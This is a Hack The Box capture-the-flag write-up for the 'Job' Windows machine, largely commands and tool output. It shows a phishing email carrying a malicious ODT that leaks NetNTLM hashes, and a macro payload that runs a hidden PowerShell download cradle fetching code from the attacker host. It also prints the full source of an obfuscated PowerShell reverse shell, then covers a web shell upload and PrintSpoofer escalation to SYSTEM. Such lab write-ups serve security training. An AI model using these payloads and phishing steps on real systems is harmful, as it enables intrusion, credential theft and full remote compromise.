HTB | Job
Machine - https://app.hackthebox.com/machines/Job
IP - 10.129.234.73
NMAP
└─$ nmap -sC -sV -p 25,80,445,3389,5985 10.129.234.73 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-10 19:23 IST
Nmap scan report for 10.129.234.73
Host is up (1.4s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-10T13:56:08+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after: 2026-03-06T13:43:05
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-10-10T13:55:37
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 158.61 secondsPort 80
There is only a single webpage with an email career@job.local asking to send resume for hiring.
whatweb
└─$ whatweb -v -a 3 <http://Job.local/>
WhatWeb report for <http://Job.local/>
Status : 200 OK
Title : Job.local
IP : 10.129.234.73
Country : RESERVED, ZZ
Summary : Bootstrap, Email[career@job.loca], HTML5, HTTPServer[Microsoft-IIS/10.0], Microsoft-IIS[10.0], Script, X-Powered-By[ASP.NET]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : <https://getbootstrap.com/>
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
<http://www.regular-expressions.info/email.html> for valid
email address matching.
String : career@job.loca
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Microsoft-IIS/10.0 (from server string)
[ Microsoft-IIS ]
Microsoft Internet Information Services (IIS) for Windows
Server is a flexible, secure and easy-to-manage Web server
for hosting anything on the Web. From media streaming to
web application hosting, IIS's scalable and open
architecture is ready to handle the most demanding tasks.
Version : 10.0
Website : <http://www.iis.net/>
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Powered-By ]
X-Powered-By HTTP header
String : ASP.NET (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 07 Nov 2021 13:05:58 GMT
Accept-Ranges: bytes
ETag: "0bf9f34d8d3d71:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 10 Oct 2025 14:01:04 GMT
Connection: close
Content-Length: 3261dirsearch
Nothing interesting was there
└─$ dirsearch -u <http://job.local/> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 29999
Output File: /home/anurag/htb/Job/reports/http_job.local/__25-10-10_19-31-44.txt
Target: <http://job.local/>
[19:31:44] Starting:
[19:32:12] 301 - 144B - /css -> <http://job.local/css/>
[19:32:12] 301 - 143B - /js -> <http://job.local/js/>
[19:32:16] 301 - 154B - /aspnet_client -> <http://job.local/aspnet_client/>
[19:32:19] 301 - 147B - /assets -> <http://job.local/assets/>
[19:32:38] 301 - 144B - /CSS -> <http://job.local/CSS/>
[19:33:03] 301 - 143B - /JS -> <http://job.local/JS/>
[19:33:06] 301 - 147B - /Assets -> <http://job.local/Assets/>
[19:33:19] 301 - 143B - /Js -> <http://job.local/Js/>
[19:33:19] 301 - 144B - /Css -> <http://job.local/Css/>
[19:40:26] 301 - 154B - /Aspnet_client -> <http://job.local/Aspnet_client/>
[19:46:14] 301 - 154B - /aspnet_Client -> <http://job.local/aspnet_Client/>
[19:57:08] 301 - 154B - /ASPNET_CLIENT -> <http://job.local/ASPNET_CLIENT/>
[20:02:25] 400 - 324B - /error%1F_log
Task Completed
Port 25
We can try sending mail using sendmail
On the webpage it was mentioned that please send your cv as a libre office document So we will send the mail with malicious .odt file and try to get the ntlm hash
Let’s use this GitHub repo for creating .odt file
└─$ python3 badodt.py
/home/anurag/htb/Job/badodf/badodt.py:13: SyntaxWarning: invalid escape sequence '\\/'
/ __ )____ _____/ / / __ \\/ __ \\/ ____/
____ __ ____ ____ ______
/ __ )____ _____/ / / __ \\/ __ \\/ ____/
/ __ / __ `/ __ /_____/ / / / / / / /_
/ /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\\__,_/\\__,_/ \\____/_____/_/
Create a malicious ODF document help leak NetNTLM Creds
By Richard Davy
@rd_pentest
Python3 version by @gustanini
www.secureyourit.co.uk
Please enter IP of listener: 10.10.16.27
/home/anurag/htb/Job/badodf/bad.odt successfully creatednow it’s time for testing, it did not worked for some reason
Now I will try msfconsole for creating the .odt file
─$ sudo msfconsole
[sudo] password for anurag:
Metasploit tip: Use sessions -1 to interact with the last opened session
# cowsay++
____________
< metasploit >
------------
\\ ,__,
\\ (oo)____
(__) )\\
||--|| *
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > use auxiliary/fileformat/odt_badodt
msf6 auxiliary(fileformat/odt_badodt) > set filename resume.odt
filename => resume.odt
msf6 auxiliary(fileformat/odt_badodt) > set lhost 10.10.16.27
lhost => 10.10.16.27
msf6 auxiliary(fileformat/odt_badodt) > run
[*] Generating Malicious ODT File
[*] SMB Listener Address will be set to 10.10.16.27
[+] resume.odt stored at /root/.msf4/local/resume.odt
[*] Auxiliary module execution completed
msf6 auxiliary(fileformat/odt_badodt) > and I will start my smb listener and send the mail
└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.234.73:25 -u 'Resume' -m 'Attaching my resume for your reference' -a 'resume.odt'
Oct 10 21:17:05 anurag sendemail[98615]: Email was sent successfully!on listner, I got the hash
└─$ impacket-smbserver share . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.234.73,65248)
[*] AUTHENTICATE_MESSAGE (JOB\\jack.black,JOB)
[*] User JOB\\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae418656b463a361d:010100000000000000c0ba24fd39dc01c8e7758b646173e100000000010010007a006d004d004b005000470068004700030010007a006d004d004b0050004700680047000200100072006a0055006f0071006100660077000400100072006a0055006f0071006100660077000700080000c0ba24fd39dc0106000400020000000800300030000000000000000000000000200000994b80cab985d99ebf724c7858c50336740c7475be965e3f6f42d2c1c88503160a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320037000000000000000000
[*] Closing down connection (10.129.234.73,65248)let’s try to crack the hash, but not able to crack it
$ hashcat jack_hash.txt /home/anurag/stuff/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3550H with Radeon Vega Mobile Gfx, 1438/2941 MB (512 MB allocatable), 3MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /home/anurag/stuff/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
<https://hashcat.net/faq/wrongdriver>
* Create more work items to make use of your parallelization power:
<https://hashcat.net/faq/morework>
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae4...000000
Time.Started.....: Fri Oct 10 21:40:18 2025 (20 secs)
Time.Estimated...: Fri Oct 10 21:40:38 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/anurag/stuff/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 810.9 kH/s (0.65ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121216a696d212121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 65%
Started: Fri Oct 10 21:40:08 2025
Stopped: Fri Oct 10 21:40:40 2025foothold/ shell
Shell as ?
Getting shell via ODT file
I will use msfconsole for the exploit
msf6 > use multi/misc/openoffice_document_macro
msf6 exploit(multi/misc/openoffice_document_macro) > set lhost 10.10.14.15
msf6 exploit(multi/misc/openoffice_document_macro) > set lport 80
msf6 exploit(multi/misc/openoffice_document_macro) > set payload windows/x64/exec
msf6 exploit(multi/misc/openoffice_document_macro) > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.15/Invoke-PowerShellTcpEx.ps1>');"
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) >
[*] Using URL: <http://10.10.14.15:8080/WyHDPdQBH>
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /root/.msf4/local/msf.odt
└─$ cat Invoke-PowerShellTcpEx.ps1
function Power
{
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
if ($Reverse)
{
$client = New-Object System.$class.TCPClient($IPAddress,$Port)
}
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sbs = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sbs,0,$sbs.Length)
$sbs = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sbs,0,$sbs.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
$sb = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sb,0,$sb.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Power -Reverse -IPAddress 10.10.14.15 -Port 9001
Let’s download WyHDPdQBH and rename Invoke-PowerShellTcpEx.ps1 to WyHDPdQBH
└─$ wget <http://10.10.14.15:8080/WyHDPdQBH>
--2025-10-14 20:06:36-- <http://10.10.14.15:8080/WyHDPdQBH>
Connecting to 10.10.14.15:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3650 (3.6K) [application/octet-stream]
Saving to: ‘WyHDPdQBH’
WyHDPdQBH 100%[=================================================================================================================================================================>] 3.56K --.-KB/s in 0s
2025-10-14 20:06:36 (186 MB/s) - ‘WyHDPdQBH’ saved [3650/3650]
┌──(anurag㉿anurag)-[~/htb/Job]
└─$ cp Invoke-PowerShellTcpEx.ps1 WyHDPdQBH Now let’s send the mail
#set up the listener
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
10.129.146.164 - - [14/Oct/2025 20:10:22] "GET /Invoke-PowerShellTcpEx.ps1 HTTP/1.1" 200 -
└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.146.164:25 -u 'Resume' -m 'Attaching my resume for your reference' -a msf.odt
Oct 14 20:09:57 anurag sendemail[79254]: Email was sent successfully!
#on msf
[*] 10.129.146.164 openoffice_document_macro - Sending payload
#on listner
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49811
Windows PowerShell running as user jack.black on JOB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\\Program Files\\LibreOffice\\program>found user.txt
Directory of C:\\Users\\jack.black\\Desktop
11/09/2021 09:43 PM <DIR> .
04/16/2025 10:48 AM <DIR> ..
10/14/2025 01:39 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 5,411,229,696 bytes free
Privilege Escalation
Shell as ?
file upload on wwwroot
The user job\jack.black, who is a member of the JOB\developers group. This group is explicitly granted FullControl permissions on C:\\inetpub\\wwwroot
PS C:\\inetpub\\wwwroot> (Get-Acl .).Access | Format-Table IdentityReference,FileSystemRights,AccessControlType -AutoSize
IdentityReference FileSystemRights AccessControlType
----------------- ---------------- -----------------
BUILTIN\\IIS_IUSRS ReadAndExecute, Synchronize Allow
JOB\\developers FullControl Allow
NT SERVICE\\TrustedInstaller FullControl Allow
NT SERVICE\\TrustedInstaller 268435456 Allow
NT AUTHORITY\\SYSTEM FullControl Allow
NT AUTHORITY\\SYSTEM 268435456 Allow
BUILTIN\\Administrators FullControl Allow
BUILTIN\\Administrators 268435456 Allow
BUILTIN\\Users ReadAndExecute, Synchronize Allow
BUILTIN\\Users -1610612736 Allow
CREATOR OWNER 268435456 Allow
PS C:\\inetpub\\wwwroot> whoami
job\\jack.black
PS C:\\inetpub\\wwwroot> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
JOB\\developers Alias S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label S-1-16-8192
PS C:\\inetpub\\wwwroot> Let’s upload the shell.aspx on wwwroot and load the page http://10.129.146.164/shell.aspx and on the listener
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49817
Spawn Shell...
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\defaultapppool
c:\\windows\\system32\\inetsrv>SeImpersonatePrivilege
c:\\windows\\system32\\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\\windows\\system32\\inetsrv>It’s time to use the potato attack
and we are nt authority\\system
PS C:\\temp> .\\PrintSpoofer64.exe -i -c cmd
.\\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
nt authority\\systemand we got the root.txt
Directory of C:\\Users\\Administrator\\Desktop
11/10/2021 05:45 PM <DIR> .
11/09/2021 08:51 PM <DIR> ..
10/14/2025 01:39 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,397,835,776 bytes freeLast updated